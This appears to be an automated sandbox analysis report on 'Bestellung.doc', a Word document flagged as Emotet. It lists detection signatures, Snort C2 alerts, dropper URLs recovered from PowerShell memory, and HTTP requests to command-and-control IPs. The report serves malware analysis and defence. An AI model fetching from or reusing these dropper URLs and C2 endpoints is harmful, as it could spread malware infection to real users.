Analysis Report Bestellung.doc

Overview

General Information

Sample Name: Bestellung.doc
Analysis ID: 344273
MD5: 268e0826d78c069d3834a8203a44af4f
SHA1: 5f14c1a62195af4f3018b57d097876fb41da7937
SHA256: f9f3c11c9f92d92d74eb40958a14d97f0f36497b6c86109b237628815642102a

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://nightlifemumbai.club/x/0wBD3/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/ Avira URL Cloud: Label: malware
Source: https://jflmktg.wpcomstaging.com/wp-content/AK/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: shop.nowfal.dev Virustotal: Detection: 7% Perma Link
Source: e-wdesign.eu Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for submitted file
Source: Bestellung.doc Virustotal: Detection: 53% Perma Link
Source: Bestellung.doc ReversingLabs: Detection: 11%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004096ED CryptDecodeObjectEx, 10_2_004096ED

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49172 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2103436602.000000001B860000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: nightlifemumbai.club
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 104.21.88.166:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.217.6.174:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49174 -> 190.55.186.229:80
Source: Traffic Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.22:49175 -> 203.157.152.9:7080
Source: Traffic Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.22:49176 -> 157.245.145.87:443
Source: Traffic Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49177 -> 132.248.38.158:80
Source: Traffic Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.22:49179 -> 110.172.180.180:8080
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmp String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 7080
Source: unknown Network traffic detected: HTTP traffic on port 7080 -> 49175
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 203.157.152.9:7080
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 110.172.180.180:8080
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 70.32.89.105:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1Host: e-wdesign.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 203.157.152.9 203.157.152.9
Source: Joe Sandbox View IP Address: 132.248.38.158 132.248.38.158
Source: Joe Sandbox View IP Address: 172.217.6.174 172.217.6.174
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: GO-DADDY-COM-LLCUS GO-DADDY-COM-LLCUS
Source: Joe Sandbox View ASN Name: MOPH-TH-APInformationTechnologyOfficeSG MOPH-TH-APInformationTechnologyOfficeSG
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/ HTTP/1.1DNT: 0Referer: 203.157.152.9/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/Content-Type: multipart/form-data; boundary=--------------------cs4PSNdop4ezuJ7KDL7qUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 203.157.152.9:7080Content-Length: 6292Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /gjk3j942rq/3t3141347sxz/js59r1n8zph/ HTTP/1.1DNT: 0Referer: 157.245.145.87/gjk3j942rq/3t3141347sxz/js59r1n8zph/Content-Type: multipart/form-data; boundary=--------------dFTqLeLs5G7gBBUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 157.245.145.87:443Content-Length: 5620Connection: Keep-AliveCache-Control: no-cache
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown TCP traffic detected without corresponding DNS query: 203.157.152.9
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.145.87
Source: unknown TCP traffic detected without corresponding DNS query: 132.248.38.158
Source: unknown TCP traffic detected without corresponding DNS query: 132.248.38.158
Source: unknown TCP traffic detected without corresponding DNS query: 132.248.38.158
Source: unknown TCP traffic detected without corresponding DNS query: 132.248.38.158
Source: unknown TCP traffic detected without corresponding DNS query: 132.248.38.158
Source: unknown TCP traffic detected without corresponding DNS query: 132.248.38.158
Source: unknown TCP traffic detected without corresponding DNS query: 70.32.89.105
Source: unknown TCP traffic detected without corresponding DNS query: 70.32.89.105
Source: unknown TCP traffic detected without corresponding DNS query: 70.32.89.105
Source: unknown TCP traffic detected without corresponding DNS query: 70.32.89.105
Source: unknown TCP traffic detected without corresponding DNS query: 70.32.89.105
Source: unknown TCP traffic detected without corresponding DNS query: 70.32.89.105
Source: unknown TCP traffic detected without corresponding DNS query: 161.49.84.2
Source: unknown TCP traffic detected without corresponding DNS query: 161.49.84.2
Source: unknown TCP traffic detected without corresponding DNS query: 161.49.84.2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE8CBF3-349E-46EF-BF24-C3A751787722}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1Host: e-wdesign.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: nightlifemumbai.club
Source: unknown HTTP traffic detected: POST /fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/ HTTP/1.1DNT: 0Referer: 203.157.152.9/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/Content-Type: multipart/form-data; boundary=--------------------cs4PSNdop4ezuJ7KDL7qUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 203.157.152.9:7080Content-Length: 6292Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Tue, 26 Jan 2021 09:49:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000003.2095132892.000000001CCE3000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.2103414288.000000001B4C5000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/EncryptionEverywhereDVTLSCA-G1.crt0
Source: powershell.exe, 00000005.00000003.2094871839.000000001CC82000.00000004.00000001.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthori
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmp String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000005.00000003.2095094346.000000001CC8D000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000005.00000002.2103563563.000000001CC40000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
